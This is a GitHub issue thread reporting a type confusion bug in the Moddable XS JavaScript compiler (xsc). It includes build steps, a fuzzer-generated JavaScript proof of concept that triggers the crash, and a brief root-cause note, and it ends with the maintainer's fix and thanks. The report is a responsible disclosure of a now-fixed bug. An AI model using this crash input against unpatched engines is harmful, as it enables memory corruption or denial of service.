Moddable-OpenSource/moddable #351: Type confusion vulnerability

rain6851, 2020-04-17:
# Enviroment
```
operating system: ubuntu18.04
apt-get install libgtk-3-dev
export MODDABLE=~/src/moddable
cd $MODDABLE/build/makefiles/lin
make

test command: ./build/bin/lin/release/xsc poc
```

# poc
```
function main() {
    let arr = [
        1.1,
        1.1,
        1.1, 1.1,
        1.1
    ];
    var DAQh = new Int32Array([
        arr,
      47483647,
        arr,
        arr
    ]);
    var ECrE = new WeakSet([
        [
            arr,
            arr,
            arr,
            3.141592653589793,
            1200,
            arr,
            arr,
            arr
        ],
        [
            0.1,
            arr,
            arr,
            arr,
            arr,
            -1,
            arr,
            arr,
            arr
        ]
    ]);
    var QWYA = new WeakSet([
        [
            9007199254740992,
            arr,
            arr,
            -9007199254740994,
            1e-81
        ],
        [
            1518500249,
            arr,
            arr,
            -9007199254740992
        ]
    ]);
    opt(function () {
    });
    var BXWH = new Int16Array([
        arr,
        3.141592653589793,
        1e-15,
        arr,
        arr,
        9007199254740994,
        arr
    ]);
    var RQpT = arr < BXWH['3'];
    var JXHX = opt(function () {
    });
    var CCfc = new Array([
        9007199254740990,
        arr,
        arr,
        arr
    ]);
    var KGzE = new Uint16Array([
        arr,
        -4294967297,
        4294967296,
        1e-81,
        -4294967297,
        3.141592653589793,
        2147483648
    ]);
    var CPYW = new Set([
        1.7976931348623157e+308,
        KGzE['3'],
        arr,
        KGzE['6'],
        KGzE['2'],
        -4294967295
    ]);
    var zdXw = new WeakSet([
        [
            arr,
            arr,
            arr
        ],
        [
            -2147483647,
            1e-81,
            arr,
            arr
        ]
    ]);
    var Ywyk = zdXw.delete(1518500249);
    var yGiG = new Int16Array([
        -4294967295,
        KGzE['4'],
        0.1,
        1200,
        -1
    ]);
    var jQRt = 0 != arr;
    var GQFe = new Set([
        1,
        arr,
        arr,
        3.141592653589793,
        arr,
        arr,
        3037000498
    ]);
    var sjsZ = opt(function () {
    });
    var bxnE = new WeakSet([
        [
            arr.length,
            5,
            0.1,
            arr
        ],
        [
            0.2,
            1e-81,
            arr.length,
            arr,
            arr,
            -1,
            arr
        ]
    ]);
    arr = bxnE.add(arr);
    bxnE = bxnE.add(arr);
    var zMRn = new Int32Array([
        1e+81,
        arr,
        arr.length,
        arr,
        arr,
        arr,
        arr,
        3
    ]);
    function opt(f) {
        arr[0] = 1.1;
        var K2sQ = ~-9007199254740991;
        var CbWF = !0;
        arr[2] = 1.1;
        var bHeM = !2147483648;
        var eYaX = new WeakSet([
            [],
            [
                -9007199254740994,
                1e+400,
                arr.length,
                -Infinity,
                arr
            ]
        ]);
        arr[3] = 1.1;
    }
    let r0 = () => '0';
    for (var i = 0; i < 4096; i++)
        opt(r0);
    opt(() => {
        arr[ ] = {};
        return '0';
    });
}
main();
```
# vulnerability description:
The stack traceback is shown in the figure:
[image]

When processing js code, first fxParserTree will be called to generate a node tree, And when met:

[image]

It can cause errors in object references, which can cause type confusion. The specific vulnerability trigger point is on line xsCode.c: 1153, as shown in the figure
[image]

The current item is considered a temporary function type that has been declared, but in fact it is an undefined array type in poc.

# PoC construction

[image]
Simply assign a value to an undefined array.

rain6851, 2020-04-24:
@bterlson @rwaldron @pmcneil @nodebotanist

rain6851, 2020-05-05:
@phoddie @mkellner @Moddable-OpenSource please check the issue

phoddie, 2020-05-07:
[Fix](https://github.com/Moddable-OpenSource/moddable/commit/723816ab9b52f807180c99fc69c7d08cf6c6bd61) pushed.

I looks like you are using some kind of fuzzer. Certainly the code doesn't look obviously useful. ;) Would you mind sharing how you generated this test?

rain6851, 2020-05-07:
> [Fix](https://github.com/Moddable-OpenSource/moddable/commit/723816ab9b52f807180c99fc69c7d08cf6c6bd61) pushed.
> 
> I looks like you are using some kind of fuzzer. Certainly the code doesn't look obviously useful. ;) Would you mind sharing how you generated this test?

I implemented a tool for testing  and I will publish a paper about it in the future.

phoddie, 2020-05-08:
Very cool. The bug reports are much appreciated. Thank you.

closed 2020-05-22 by phoddie